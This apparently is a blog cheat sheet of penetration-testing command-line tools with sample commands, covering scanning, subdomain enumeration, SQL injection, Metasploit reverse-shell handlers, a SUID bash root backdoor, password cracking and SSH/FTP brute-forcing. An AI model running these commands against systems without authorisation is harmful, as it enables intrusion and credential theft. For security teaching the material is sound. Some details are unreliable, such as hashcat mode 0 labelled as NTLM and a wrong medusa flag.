Top 60 Hacking Command Line Tools with Examples

  • Ryan McCain
  • March 4, 2025
  • 12:59 pm
  • 0 comments

Think you know hacking? If you’re not using these 60 command-line tools, you’re missing out on some of the most powerful tricks in the game. In ethical hacking and cybersecurity, knowing the right command-line tools can make all the difference. Whether you're conducting network reconnaissance, exploiting vulnerabilities, escalating privileges, or performing forensic analysis, mastering these commands is essential for penetration testing and security assessments.

This mega guide covers 60 essential hacking command line tools used in network scanning, web exploitation, privilege escalation, wireless attacks, and digital forensics. Many of these tools are pre-installed in Kali Linux, the go-to operating system for ethical hackers, but they are also available on other Linux distributions and cybersecurity toolkits.

From classic utilities like nmap and tcpdump to powerful tools like mimikatz, aircrack-ng, and sqlmap, this guide provides detailed descriptions, real-world use cases, and practical examples to help you apply them effectively in penetration testing and cybersecurity defense.

Let's dive in!

Top 60 Hacking Command Line Commands with Examples

Networking & Reconnaissance

ping

  • Description: ping is the foundational network connectivity test, crucial for initial reconnaissance and troubleshooting. It sends ICMP echo requests to a target, verifying if a host is alive and reachable. In penetration testing, it's the first step to confirm the target's online presence. Beyond reachability, it measures round-trip time, revealing network latency. High latency or unreachable hosts can indicate network issues, denial-of-service attacks, or unauthorized devices. For network security, consistent high latency can be a sign of a problem, and a lack of response can suggest a target is deliberately blocking ICMP, potentially indicating a hardened system or an attempt to evade detection. Remember, some systems block ICMP requests, so a failed ping does not always equal a down system.
  • Examples:
    • ping google.com: Verifies if Google's servers are reachable, confirming the target's online presence in penetration testing.
    • ping 192.168.1.1: Checks connectivity to a local device, confirming the presence and responsiveness of critical infrastructure in network security.

Alternatives to ping: fping alternatively scans multiple hosts at once, making it faster and more efficient for reconnaissance compared to ping, which can only check one host at a time. nping, part of the Nmap suite, is another option that adds timestamping, packet crafting, and latency analysis, making it useful for more advanced network diagnostics.

iftop

  • Description: iftop provides real-time network traffic analysis, displaying bandwidth usage per connection. In penetration testing, it's essential for observing traffic patterns during active attacks, such as denial-of-service simulations or data exfiltration. Imagine monitoring a server during a penetration test; iftop can reveal the exact connections consuming bandwidth during a simulated attack. This tool is equally valuable for defensive purposes, such as detecting anomalous traffic patterns that might indicate a compromised host, unauthorized connections, or anomalies that might indicate intrusion or malware activity. It's a dynamic, interactive view, allowing for quick identification of unusual traffic.
  • Examples:
    • sudo iftop: Monitors all network interfaces, showing overall bandwidth usage. In network security, this is a baseline view for detecting sudden traffic spikes.
    • sudo iftop -i eth0: Focuses on a specific interface, useful in penetration testing to isolate traffic related to an attack or in network security to monitor a critical segment.

Alternatives to iftop: bmon alternatively provides graphical network traffic analysis, allowing users to see bandwidth usage trends over time instead of just real-time data like iftop. nload is another option that adds visual graphs of incoming and outgoing traffic, making it more intuitive for monitoring network usage spikes.

At Norzer, we offer managed WordPress hosting, custom WordPress website design, and local SEO services to help your business grow. With secure, high-performance hosting and expert support, we handle the tech so you can focus on success. Get started today! 🚀

hping3

  • Description: hping3 is a powerful packet crafting tool for highly customized network probes. In penetration testing, it's used for advanced port scanning, firewall testing, and simulating various network attacks, like SYN floods or fragmented packet attacks. It can bypass basic firewall rules and provide detailed information about target network behavior. For network security, it's used to test firewall rules and intrusion detection systems, confirming their effectiveness against crafted packets. During a penetration test, you could use hping3 to send fragmented packets to a target, attempting to bypass intrusion detection systems that might not properly reassemble fragmented traffic. For example, a pentester could use hping3 to craft packets with specific flags to test how a firewall handles out-of-sequence TCP segments.
  • Examples:
    • sudo hping3 -S -p 80 google.com: Performs a SYN scan on port 80, checking if it's open. In penetration testing, this is a common port scanning technique.
    • sudo hping3 -c 10 -1 192.168.1.1: Sends 10 ICMP packets, useful for testing ICMP filtering or simulating ICMP-based attacks. In network security, this tests how a firewall handles ICMP traffic.

Alternatives to hping3: Scapy alternatively allows full packet crafting and manipulation, making it a more powerful tool for penetration testing, whereas hping3 is mostly used for basic scanning and attack simulations. nping, from Nmap, is another option that adds advanced timing and performance measurements, allowing pentesters to simulate network traffic and measure latency with precision.

ptunnel

  • Description: ptunnel creates ICMP tunnels, allowing you to bypass firewalls that block standard TCP/UDP traffic. In penetration testing, it's a technique to establish covert channels for command and control or data exfiltration. In network security, it highlights the potential for ICMP tunneling to bypass security measures, emphasizing the need for robust ICMP filtering and monitoring. A pentester could use ptunnel to tunnel SSH traffic through an ICMP connection, bypassing a firewall that blocks standard SSH ports. Using ptunnel to bypass security measures without authorization is illegal and unethical; it's crucial to obtain proper permissions before using this tool on any network. This tool requires setup of a client and server portion.
  • Examples:
    • ptunnel: Running this starts the interactive setup. In penetration testing, this can be used to tunnel SSH through a restrictive firewall. In network security, monitoring for unusual ICMP traffic can detect such tunnels.

Alternatives to ptunnel: Chisel alternatively supports encrypted TCP/UDP tunneling, making it more secure and cross-platform compared to ptunnel, which only works with ICMP tunnels. ICMPTX is another option that adds improved ICMP tunneling performance, making it a lighter and more efficient choice if you specifically need to tunnel over ICMP.

tcpdump

  • Description: tcpdump is the essential packet capture tool for network analysis. In penetration testing, it's used to capture network traffic during attacks, analyze protocol behavior, and identify vulnerabilities. In network security, it's crucial for incident response, network monitoring, and security auditing. It allows for detailed inspection of network traffic, aiding in the detection of malicious activity or protocol anomalies. During incident response, capturing traffic and filtering by a suspicious IP address can quickly isolate potentially malicious communication. After the capture, the .pcap file can be analyzed in Wireshark. After capturing traffic with tcpdump, you can use Wireshark to perform a detailed analysis of the captured packets, filtering by protocol, source/destination IP, or port.
  • Examples:
    • sudo tcpdump -i eth0 port 80: Captures HTTP traffic, useful for analyzing web application behavior or intercepting credentials in penetration testing.
    • sudo tcpdump -w capture.pcap: Saves captured traffic to a file, allowing for offline analysis with tools like Wireshark, essential for detailed forensic investigations.

Alternatives to tcpdump: Tshark alternatively provides deep packet analysis with better filtering and export options, allowing forensic investigators to analyze network traffic at a more granular level than tcpdump. Wireshark is another option that adds a graphical user interface (GUI) and protocol analysis, making it easier for beginners while still providing advanced packet inspection features.

nmap

  • Description: nmap is a cornerstone of network reconnaissance, used for host discovery, port scanning, and service enumeration. In penetration testing, it's the primary tool for mapping target networks, identifying open ports, and discovering vulnerable services. Discovering outdated services, like an old version of SSH or Apache, can reveal potential vulnerabilities to known exploits. For network security, nmap is used for vulnerability scanning and identifying unauthorized devices. Imagine a scenario where you're a security analyst: running nmap -sV on your network's perimeter can quickly reveal any services running with known vulnerabilities. After discovering open ports, you could then use tools like hping3 to craft specific packets to further probe the target. It is important to remember that using nmap against networks without authorization is illegal. Understanding nmap's output, especially the 'state' column, is crucial for identifying open ports and potential attack vectors.
  • Examples:
    • nmap 192.168.1.0/24: Scans a network range, discovering active hosts. In penetration testing, this maps the target network.
    • nmap -sV -sC google.com: Performs service version detection and runs default scripts, identifying services and potential vulnerabilities. In network security, this is used for vulnerability assessments.

Alternatives to nmap: masscan alternatively provides ultra-fast port scanning, capable of scanning entire internet ranges in seconds, making it ideal for large-scale reconnaissance. rustscan is another option that adds speed and automatic port enumeration, making it significantly faster than nmap when scanning multiple targets, while still integrating with nmap for deeper analysis.

masscan

  • Description: masscan is an ultra-fast port scanner designed for large-scale network scans. In penetration testing, it's used to quickly identify open ports on vast networks, allowing for rapid reconnaissance. In network security, it's used for large-scale vulnerability assessments and identifying exposed services. While faster than nmap, it can sacrifice accuracy for speed. For example, a penetration tester tasked with assessing a large cloud provider could use masscan to quickly find all exposed web servers.
  • Examples:
    • sudo masscan 192.168.0.0/16 -p1-65535: This scans all ports on a large network, quickly identifying open services.
    • sudo masscan 10.0.0.0/8 -p 80,443 --rate=1000: This scans specific ports on a massive network, useful for identifying exposed web servers.

Alternatives to masscan: naabu alternatively offers a modern and lightweight approach to port scanning with built-in rate limiting and automation-friendly output, making it better suited for integration into large-scale security assessments. zmap is another option that provides extremely high-speed internet-wide scanning, though it is more specialized for research and network-wide scanning rather than targeted penetration tests.

whois

  • Description: whois is a crucial tool for Open Source Intelligence (OSINT) gathering, providing domain registration information. It's used to identify domain owners, their contact details, and name servers, aiding in social engineering or targeted attacks. During a penetration test, knowing the administrative contact details of a target domain can be an invaluable starting point. For network security, whois helps investigate suspicious domains or identify potential phishing sites by revealing registrant details and historical information. It is a quick way to gain information about a target.
  • Examples:
    • whois google.com: Retrieves the registration details for the google.com domain, revealing registrant, contact, and name server information, useful for initial reconnaissance.
    • whois 192.0.2.1: Retrieves registration details for the IP address block 192.0.2.1, revealing the owner of the IP range, aiding in understanding target infrastructure.

Alternatives to whois: amass alternatively provides deeper reconnaissance by integrating domain enumeration with certificate transparency logs, DNS scraping, and API-based lookups, making it more effective for attack surface discovery. subfinder is another option that automates subdomain enumeration and OSINT gathering, offering a more comprehensive view of a target's external assets than whois alone.

whatweb

  • Description: whatweb is a website fingerprinting tool that identifies technologies used by websites, providing insights into a target's infrastructure. During a penetration test, identifying vulnerable software or CMS versions is crucial for exploit selection, and whatweb provides that information quickly. For network security, whatweb is used to assess the security posture of web applications and identify potential attack vectors by revealing the web server, programming languages, and frameworks used. It allows for quick identification of software versions.
  • Examples:
    • whatweb google.com: Identifies the web server, programming languages, and CMS used by google.com, revealing the technologies behind the site, giving insight into potential vulnerabilities.
    • whatweb https://example.vulnerable-site.com: Identifies technologies used on a potentially vulnerable website, helping a penetration tester identify attack vectors, such as outdated plugins.

Alternatives to whatweb: katana alternatively acts as a modern web crawling and fingerprinting tool that not only identifies web technologies but also finds hidden directories and sensitive files, making it more useful for penetration testers. wappalyzer is another option that provides more detailed insights into web stack detection, including JavaScript frameworks, third-party integrations, and CMS fingerprinting.

curl

  • Description: curl is a versatile command-line tool for transferring data with URLs, supporting various protocols. It's used to interact with web applications, test APIs, and download files, making it an essential tool for web interaction during a penetration test. For network security, curl is used to test web server configurations, inspect HTTP responses, and automate security checks by sending custom HTTP requests.
  • Examples:
    • curl google.com: Retrieves the raw HTML content of google.com, useful for analyzing website structure and searching for hidden information.
    • curl -I google.com: Retrieves HTTP headers, useful for inspecting server information and response codes, aiding in identifying misconfigurations.

Alternatives to curl: httpx alternatively offers a more security-focused approach to making web requests, with built-in handling of web security headers, redirects, and fingerprinting, making it more efficient for reconnaissance. aria2 is another option that specializes in high-performance multi-threaded downloads, making it useful for bulk data retrieval compared to curl.

wget

  • Description: wget is a non-interactive command-line tool for downloading files from the web. During a penetration test, it can be used to download files from vulnerable web servers or to mirror websites for offline analysis. For network security, wget is used to automate the downloading of security updates or to retrieve files from remote servers, aiding in system maintenance and security patching.
  • Examples:
    • wget https://example.com/file.zip: Downloads the file "file.zip" from the specified URL, useful for retrieving potentially vulnerable files.
    • wget -r https://example.com: Recursively downloads the entire website "example.com," creating a local copy for offline analysis.

Alternatives to wget: axel alternatively provides faster, multi-threaded downloading with parallel connections, making it a more efficient replacement for wget in many scenarios. yt-dlp is another option that specializes in downloading media files, particularly useful for scraping video and audio content from web sources.

amass

  • Description: amass is an advanced subdomain enumeration tool, used to discover subdomains of a target domain. During a penetration test, it's used to expand the attack surface by identifying hidden subdomains, such as development or staging environments that might have weaker security. For network security, amass can be used to discover rogue subdomains or to identify misconfigured DNS records, aiding in asset discovery and security audits.
  • Examples:
    • amass enum -d example.com: Enumerates subdomains of the domain "example.com," discovering hidden subdomains, which can reveal overlooked attack vectors.
    • amass enum -brute -d example.com: Enumerates subdomains of the domain "example.com" and uses brute forcing to find additional subdomains, increasing the chances of finding vulnerable systems.
Top 60 Hacking Command Line Commands with Examples 3

Alternatives to amass: assetfinder alternatively simplifies subdomain discovery and OSINT gathering by focusing on automation-friendly workflows and API-based enumeration. crt.sh is another option that specifically leverages certificate transparency logs to uncover related domains and subdomains, often revealing more hidden assets than passive DNS tools alone.

sublist3r

  • Description: sublist3r is a subdomain enumeration tool, used to discover subdomains using various search engines and online services. During a penetration test, it's used to expand the attack surface by identifying hidden subdomains, such as admin or mail subdomains that might expose sensitive services. For network security, sublist3r can be used to discover rogue subdomains or to identify misconfigured DNS records, aiding in asset discovery and security audits.
  • Examples:
    • python sublist3r.py -d example.com: Enumerates subdomains of the domain "example.com," searching various online sources, revealing potentially vulnerable subdomains.
    • python sublist3r.py -d example.com -b all: Enumerates subdomains of the domain "example.com" using all available sources, maximizing the discovery of potential attack vectors.

Alternatives to sublist3r: aquatone alternatively provides a more modern approach to subdomain discovery by incorporating screenshot capture and automated analysis of discovered domains, making it easier to assess potential targets visually. subfinder is another option that integrates seamlessly with other reconnaissance tools, automating passive and active subdomain enumeration for more accurate results.

dnsenum

  • Description: dnsenum is a tool for gathering DNS information about a domain. During a penetration test, it's used to discover DNS records, such as A, MX, and NS records, which can reveal valuable information about the target network, like internal IP addresses or mail server information. For network security, dnsenum can be used to identify misconfigured DNS records or to discover rogue DNS servers, aiding in DNS security audits and troubleshooting.
  • Examples:
    • dnsenum example.com: Gathers DNS information about the domain "example.com," revealing DNS records, which can aid in mapping the target network.
    • dnsenum example.com -f /usr/share/wordlists/dnsmap.txt: Gathers DNS information about the domain "example.com" and uses a custom wordlist to brute force subdomains, uncovering hidden systems.

Alternatives to dnsenum: dnsx alternatively offers a faster, more modern DNS reconnaissance tool that includes brute-force enumeration, wildcard detection, and subdomain takeover identification, making it a superior option for penetration testers. fierce is another option that remains useful for network-level DNS reconnaissance, particularly for mapping internal corporate networks.

dig

  • Description: dig is a DNS lookup tool, used to query DNS servers for information about domain names. During a penetration test, it's used to retrieve DNS records, such as A, MX, and NS records, which can reveal valuable information about the target network, such as the IP address of a target domain or mail server information. For network security, dig is used to troubleshoot DNS issues or to verify DNS configurations, aiding in DNS analysis and troubleshooting.
  • Examples:
    • dig example.com: Performs a DNS lookup for the domain "example.com," revealing A records, confirming the target's IP address.
    • dig MX example.com: Retrieves the MX records for the domain "example.com," revealing mail server information, which can be useful for targeted attacks.

Alternatives to dig: host alternatively simplifies DNS lookups and provides cleaner, script-friendly output, making it easier to integrate into automation workflows. dnsrecon is another option that expands DNS enumeration capabilities by supporting zone transfers, brute-force lookups, and automated discovery of misconfigurations.

nslookup

  • Description: nslookup is a DNS lookup tool, used to query DNS servers for information about domain names. During a penetration test, it's used to retrieve DNS records, such as A, MX, and NS records, which can reveal valuable information about the target network, such as IP addresses or mail server details. For network security, nslookup can be used to troubleshoot DNS issues or verify DNS configurations, aiding in network diagnostics and security audits.
  • Examples:
    • nslookup example.com: Performs a DNS lookup for the domain "example.com," revealing A records, useful for confirming IP addresses.
    • nslookup -type=MX example.com: Retrieves the MX records for the domain "example.com," revealing mail server information, which can be valuable for targeted email attacks.

Alternatives to nslookup: dig alternatively provides more detailed DNS query analysis, supporting a wider range of query types and offering better debugging capabilities, making it the preferred choice for penetration testers and security analysts. dnsx is another option that enhances DNS reconnaissance with support for automated subdomain discovery, wildcard detection, and security misconfiguration analysis.

Before there were hackers, there were phone phreaks—the OG cyberpunks who hijacked phone systems and outsmarted telecom giants. Their exploits paved the way for modern hacking. Want to know how they did it? Check out my deep dive into the untold history of phone phreaking.

fierce

  • Description: fierce is a DNS enumeration tool, used to discover subdomains and IP addresses associated with a domain. During a penetration test, it's used to expand the attack surface by identifying hidden subdomains, which might expose vulnerable systems or services. For network security, fierce can be used to discover rogue subdomains or identify misconfigured DNS records, aiding in asset discovery and security audits.
  • Examples:
    • fierce -dns example.com: Enumerates subdomains of the domain "example.com," revealing potential attack vectors.
    • fierce -dns example.com -wordlist /usr/share/wordlists/fierce.txt: Enumerates subdomains of the domain "example.com" using a custom wordlist, maximizing the discovery of hidden systems.

Alternatives to fierce: dnsrecon alternatively offers a more comprehensive DNS enumeration toolset, supporting brute-force enumeration, subdomain discovery, and zone transfer checks, making it superior for mapping large attack surfaces. amass is another option that integrates passive and active DNS reconnaissance with OSINT techniques, making it a stronger alternative for large-scale penetration tests.

theHarvester

  • Description: theHarvester is an OSINT tool, used to gather emails, subdomains, and names from various sources, such as search engines and PGP key servers. During a penetration test, it's used to gather information about the target organization, which can be used for social engineering or targeted attacks. For network security, theHarvester can be used to discover exposed email addresses or identify potential phishing targets, aiding in security awareness and incident response.
  • Examples:
    • theharvester -d example.com -l 500 -b all: Gathers emails, subdomains, and names from various sources for the domain "example.com," revealing potential targets for social engineering.
    • theharvester -d example.com -b google: Gathers emails, subdomains, and names from Google search results for the domain "example.com," focusing on a specific search engine.

Alternatives to theHarvester: holehe alternatively focuses on identifying usernames and email addresses across multiple online platforms, making it a more effective OSINT tool for tracking down account associations. metagoofil is another option that specializes in extracting metadata from public documents, revealing potential usernames, email addresses, and system details from corporate files.

Web Hacking & Exploitation

nikto

  • Description: nikto is a web server vulnerability scanner that checks for numerous issues, including outdated server software, insecure files and CGI scripts, and various server misconfigurations. During a penetration test, it's used to quickly identify potential weaknesses in web servers, revealing common vulnerabilities that might be exploited. For network security, nikto aids in auditing web server configurations and pinpointing areas that need hardening, helping to secure web applications.
  • Examples:
    • nikto -h example.com: Scans the web server at "example.com" for vulnerabilities, revealing common security issues.
    • nikto -h example.com -p 8080: Scans the web server at "example.com" on port 8080, targeting specific ports.

Alternatives to nikto: nuclei alternatively provides a modern web vulnerability scanner with built-in templates for identifying misconfigurations, outdated software, and security flaws, making it a faster and more scalable replacement for nikto. wpscan is another option specifically designed for WordPress security assessments, identifying vulnerable themes, plugins, and configurations more effectively than generic scanners.

gobuster

  • Description: gobuster is a directory and file brute-forcing tool, used to discover hidden directories and files on web servers by brute-forcing common names. During a penetration test, this helps to uncover hidden admin panels, backup files, or other sensitive resources that might be exposed. For network security, gobuster can be used to identify exposed directories that shouldn't be publicly accessible, aiding in securing web applications.
  • Examples:
    • gobuster dir -u http://example.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt: Brute-forces directories on "example.com" using the specified wordlist, revealing hidden resources.
    • gobuster vhost -u example.com -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt: Brute-forces virtual hosts for example.com using a top 5000 subdomain wordlist.

Alternatives to gobuster: ffuf alternatively is a high-speed fuzzing tool with better automation, filtering options, and custom payload support, making it a superior alternative for directory and file enumeration. dirsearch is another option that provides an easy-to-use interface and optimized performance for brute-force discovery of web directories and hidden files.

wpscan

  • Description: wpscan is a specialized security scanner designed for WordPress installations, checking for vulnerabilities in WordPress core, plugins, and themes. During a penetration test, it's used to find weaknesses in WordPress sites, revealing outdated components that might be exploited. For network security, wpscan aids in auditing and hardening WordPress deployments, helping to secure WordPress installations.
  • Examples:
    • wpscan --url example.com: Scans the WordPress site at "example.com" for vulnerabilities, revealing potential security issues.
    • wpscan --url example.com --enumerate p: Enumerates plugins on the WordPress site at example.com.

Alternatives to wpscan: droopescan alternatively offers better detection for Drupal and Joomla vulnerabilities, making it a strong complement to wpscan for broader CMS security assessments. WPScan remains the best choice for WordPress security testing but can be used alongside droopescan for better CMS coverage.

sqlmap

  • Description: sqlmap is an automated SQL injection tool, automating the process of detecting and exploiting SQL injection vulnerabilities in web applications. During a penetration test, it's used to gain unauthorized access to databases, revealing sensitive information. For network security, sqlmap helps to identify and patch SQL injection vulnerabilities, aiding in securing web applications.
  • Examples:
    • sqlmap -u "http://example.com/page.php?id=1": Attempts to exploit SQL injection vulnerabilities in the "id" parameter of the specified URL, revealing database access.
    • sqlmap -u "http://example.com/page.php?id=1" --dbs: Enumerates databases on the target server.

Alternatives to sqlmap: sqlninja alternatively specializes in targeting Microsoft SQL Server databases, providing more advanced exploitation options specifically for SQL Server environments. noSQLMap is another option that is designed to detect and exploit NoSQL injection vulnerabilities, covering modern database systems like MongoDB that sqlmap does not handle.

searchsploit

  • Description: searchsploit is a command-line search tool for Exploit-DB, a database of exploits and vulnerabilities. During a penetration test, it's used to find exploits related to specific software or vulnerabilities, aiding in exploit development. For network security, searchsploit aids in researching vulnerabilities and developing mitigations, helping to secure systems.
  • Examples:
    • searchsploit apache 2.4: Searches Exploit-DB for exploits related to Apache web server version 2.4, revealing potential exploits.
    • searchsploit wordpress plugin upload: Searches Exploit-DB for exploits related to WordPress plugins handling uploads.

Alternatives to searchsploit: exploit-db’s GitHub repository alternatively provides direct access to the latest public exploits in a continuously updated format, making it more reliable for finding fresh exploits compared to searchsploit’s local database. metasploit-framework is another option that integrates public exploits with automated payload deployment, making it more useful for real-world penetration tests.

ffuf

  • Description: ffuf (Fuzz Faster U Fool) is a fast web fuzzer, used to discover hidden directories and files on web servers by fuzzing URLs. During a penetration test, it's used to uncover hidden resources and potential vulnerabilities, expanding the attack surface. For network security, ffuf can be used to identify exposed directories that shouldn't be publicly accessible, aiding in securing web applications.
  • Examples:
    • ffuf -u http://example.com/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt: Fuzzes directories on "example.com" using the specified wordlist, revealing hidden resources.
    • ffuf -u http://example.com/FUZZ.php -w /usr/share/wordlists/extensions_common.txt: Fuzzes file extensions on a known path.

Alternatives to ffuf: wfuzz alternatively provides more in-depth fuzzing capabilities with better support for testing web applications against injection attacks and authentication bypasses. feroxbuster is another option that offers recursive directory brute-forcing, making it particularly effective for discovering deeply hidden files and directories in web applications.

cewl

  • Description: cewl (Custom Word List generator) is a tool that generates custom wordlists by spidering a website and extracting words from its content. During a penetration test, it's used to create targeted wordlists for password cracking or brute-forcing, increasing the chances of success. For network security, cewl can be used to analyze website content and identify potential weaknesses, aiding in securing web applications.
  • Examples:
    • cewl -w wordlist.txt http://example.com: Spiders "example.com" and generates a wordlist named "wordlist.txt," revealing potential passwords.
    • cewl -d 2 -w wordlist.txt http://example.com: Spiders "example.com" with a depth of 2 and generates a wordlist.

Alternatives to cewl: commonspeak2 alternatively leverages real-world wordlists from GitHub and other sources to generate more relevant custom password lists for brute-force attacks. crunch is another option that allows the creation of highly customizable wordlists with specific character patterns and rules, making it useful for targeted password cracking.

xssstrike

  • Description: xssstrike is an automated cross-site scripting (XSS) scanner, used to analyze web pages and identify XSS vulnerabilities. During a penetration test, it's used to find weaknesses that could be exploited to inject malicious scripts, revealing potential XSS vulnerabilities. For network security, xssstrike aids in identifying and patching XSS vulnerabilities, helping to secure web applications.
  • Examples:
    • xssstrike -u http://example.com/page.php?param=value: Scans the specified URL for XSS vulnerabilities, revealing potential injection points.
    • xssstrike -u http://example.com/page.php?param=value -p param: Specifically targets the 'param' parameter.

Alternatives to xssstrike: dalfox alternatively provides a more modern and automated approach to detecting and exploiting cross-site scripting (XSS) vulnerabilities, with better payload encoding and WAF bypass techniques. XSStrike is still effective, but dalfox is faster, more robust, and actively maintained, making it a better choice for penetration testers.

xsser

  • Description: xsser (Cross Site Scripting riger) is a comprehensive XSS vulnerability scanner, testing for a wide range of XSS vulnerabilities. During a penetration test, it's used to identify weaknesses that could be exploited to inject malicious scripts, revealing potential XSS vulnerabilities. For network security, xsser aids in identifying and patching XSS vulnerabilities, helping to secure web applications.
  • Examples:
    • xsser --url="http://example.com/page.php?param=value": Scans the specified URL for a wide range of XSS vulnerabilities.
    • xsser --url="http://example.com/page.php?param=value" --headers="Cookie: test=value": Scans the URL and includes the specified cookie header.

Alternatives to xsser: Burp Suite alternatively offers a more comprehensive suite for testing web application vulnerabilities, including XSS, SQL injection, and authentication flaws, making it a superior choice over xsser. zap (OWASP Zed Attack Proxy) is another option that provides automated and manual web security testing with a focus on ease of use, making it an excellent free alternative for web application assessments.

Exploitation & Privilege Escalation

git

  • Description: git is a distributed version control system, primarily used for software development. During a penetration test, it's often used to find sensitive data in public repositories, such as API keys, passwords, or configuration files, revealing potential vulnerabilities. For network security, git can be used to audit repositories for exposed sensitive data, aiding in securing codebases.
  • Examples:
    • git clone https://github.com/user/repo.git: Clones a Git repository from the specified URL, allowing for local analysis to search for exposed credentials.
    • git log -S "password": Searches the Git repository's history for commits containing the word "password," revealing potential exposed credentials in past commits.

Alternatives to git (for security purposes): trufflehog alternatively automates scanning for exposed secrets, API keys, and passwords in git repositories, making it a more powerful tool for identifying sensitive data leaks. gitLeaks is another option that focuses on detecting and preventing secrets from being committed to repositories, helping organizations secure their development pipelines.

msfconsole

  • Description: msfconsole is the command-line interface for the Metasploit Framework, a penetration testing platform. During a penetration test, it's used to exploit vulnerabilities, launch attacks, and manage payloads, revealing potential weaknesses. For network security, msfconsole can be used to simulate attacks and validate security controls, aiding in securing systems.
  • Examples:
    • msfconsole: Launches the Metasploit Framework console, providing access to exploits and payloads, which can then be configured and launched against a test target.
    • use exploit/multi/handler: Selects a multi-handler exploit within Metasploit, which can be used to catch reverse shells from exploited systems.

Alternatives to msfconsole: Cobalt Strike alternatively provides a full-featured command-and-control (C2) framework with advanced post-exploitation capabilities, making it a more robust alternative for red team operations. Sliver C2 is another option that offers a free, open-source C2 framework that competes with Cobalt Strike, making it a strong choice for penetration testers looking for stealthy, customizable payloads.

sudo chmod +s /bin/bash

  • Description: sudo chmod +s /bin/bash sets the SUID (Set User ID) bit on the /bin/bash executable, granting any user who executes /bin/bash root privileges. During a penetration test, this is a common privilege escalation technique, revealing potential misconfigurations. For network security, this command highlights the dangers of misconfigured SUID bits, emphasizing the need for proper file permissions. Caution: This command is highly dangerous and should only be used in controlled environments.
  • Examples:
    • sudo chmod +s /bin/bash: Sets the SUID bit on /bin/bash, granting root privileges to any user who executes it, allowing for easy privilege escalation.
    • ls -l /bin/bash: Verifies the SUID bit is set on /bin/bash after the command is executed, showing the modified file permissions.

Alternatives to sudo chmod +s /bin/bash (for privilege escalation): linpeas alternatively provides an automated privilege escalation enumeration tool that scans for common misconfigurations and privilege escalation opportunities, making it more efficient and safer to use. GTFOBins is another option that catalogs known privilege escalation techniques for binaries commonly found on Linux systems, making it an essential resource for pentesters.

setoolkit

  • Description: setoolkit (Social-Engineer Toolkit) is a framework for conducting social engineering attacks, providing tools for phishing, credential harvesting, and other techniques. During a penetration test, it's used to simulate social engineering attacks, revealing potential weaknesses in user awareness. For network security, setoolkit can be used to educate users about social engineering threats, aiding in security awareness training.
  • Examples:
    • setoolkit: Launches the Social-Engineer Toolkit, providing access to various social engineering attacks, such as phishing campaigns.
    • setoolkit > 1: Selects the social-engineering attacks option, allowing the user to create various social engineering attack vectors.

Alternatives to setoolkit: evilginx2 alternatively provides a modern approach to phishing and credential interception, allowing attackers to bypass multi-factor authentication (MFA) by hijacking session cookies, making it a more advanced alternative for social engineering attacks. gophish is another option that is widely used for simulating phishing campaigns and testing an organization’s security awareness.

beef-xss

  • Description: beef-xss (Browser Exploitation Framework) is a penetration testing tool that focuses on exploiting cross-site scripting (XSS) vulnerabilities, allowing control of compromised browsers. During a penetration test, it's used to demonstrate the impact of XSS vulnerabilities, revealing potential weaknesses. For network security, beef-xss can be used to validate XSS mitigations, aiding in securing web applications.
  • Examples:
    • beef-xss: Launches the Browser Exploitation Framework, providing control of compromised browsers, allowing for post-exploitation actions.
    • Injecting a BeEF hook into a vulnerable web page: This allows BeEF to control the browser that visits that page, enabling actions like keylogging or cookie theft.

Alternatives to beef-xss: evilginx2 alternatively offers a more practical and scalable approach to credential harvesting and session hijacking, making it a better alternative to traditional browser-based exploitation techniques like those used in beef-xss. Burp Suite Pro is another option that allows for deeper web security testing, including XSS payload testing and automated scanning.

john

  • Description: john (John the Ripper) is a password cracking tool, used to crack passwords from various sources, such as password hashes or encrypted files. During a penetration test, it's used to crack passwords, revealing potential weaknesses in password policies. For network security, john can be used to audit password strength, aiding in securing systems.
  • Examples:
    • john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt: Attempts to crack the password hashes in "hash.txt" using the specified wordlist, revealing weak passwords.
    • john --show hash.txt: Shows the cracked passwords from "hash.txt," displaying the cracked passwords.

Alternatives to john the ripper: hashcat alternatively provides significantly faster password cracking capabilities, leveraging GPU acceleration to break hashes at an exponentially faster rate than John the Ripper. THC Hydra is another option that specializes in online password brute-forcing, making it more suitable for testing authentication systems.

hashcat

  • Description: hashcat is a fast password cracking tool, supporting various cracking methods and hash types. During a penetration test, it's used to crack passwords quickly, revealing potential weaknesses in password policies. For network security, hashcat can be used to audit password strength, aiding in securing systems.
  • Examples:
    • hashcat -m 0 -a 3 hash.txt ?l?l?l?l?l?l: Attempts to crack NTLM hashes in "hash.txt" using a brute-force attack with lowercase letters, revealing weak hashes.
    • hashcat -m 0 -a 0 hash.txt /usr/share/wordlists/rockyou.txt: Attempts to crack NTLM hashes in "hash.txt" using a wordlist attack, revealing passwords found in the wordlist.

Alternatives to hashcat: hashcat remains the best offline password cracking tool, but john the ripper jumbo version alternatively provides a highly optimized, multi-platform password cracking solution that supports a wider range of hash formats. Hydra is another option that is optimized for online password attacks, making it useful in scenarios where direct authentication testing is required.

hydra

  • Description: hydra is a brute-force login tool, used to crack login credentials for various services, such as SSH, FTP, and HTTP. During a penetration test, it's used to crack login credentials, revealing potential weaknesses in authentication. For network security, hydra can be used to test the strength of login credentials, aiding in securing systems.
  • Examples:
    • hydra -l user -P /usr/share/wordlists/rockyou.txt ssh://example.com: Attempts to crack the SSH login for the user "user" on "example.com" using the specified wordlist, revealing weak SSH passwords.
    • hydra -L users.txt -P passwords.txt ftp://example.com: Uses username and password files to brute-force an FTP login, revealing weak FTP credentials.

Alternatives to hydra: medusa alternatively provides high-speed, parallel brute-force attacks with more built-in service support, making it a great alternative for testing authentication systems. ncrack is another option that focuses on network authentication cracking, with optimizations for services like SSH, RDP, and FTP.

Top 60 Hacking Command Line Commands with Examples 2

medusa

  • Description: medusa is a parallel brute-force login tool, similar to Hydra, used to crack login credentials for various services. During a penetration test, it's used to crack login credentials, revealing potential weaknesses in authentication. For network security, medusa can be used to test the strength of login credentials, aiding in securing systems.
  • Examples:
    • medusa -h example.com -u user -P /usr/share/wordlists/rockyou.txt -M ssh: Attempts to crack the SSH login for the user "user" on "example.com" using the specified wordlist, in a parallelized fashion.
    • medusa -H hosts.txt -U users.txt -P passwords.txt -m ftp: Brute forces ftp logins using host, username and password files, utilizing parallel connections for faster cracking.

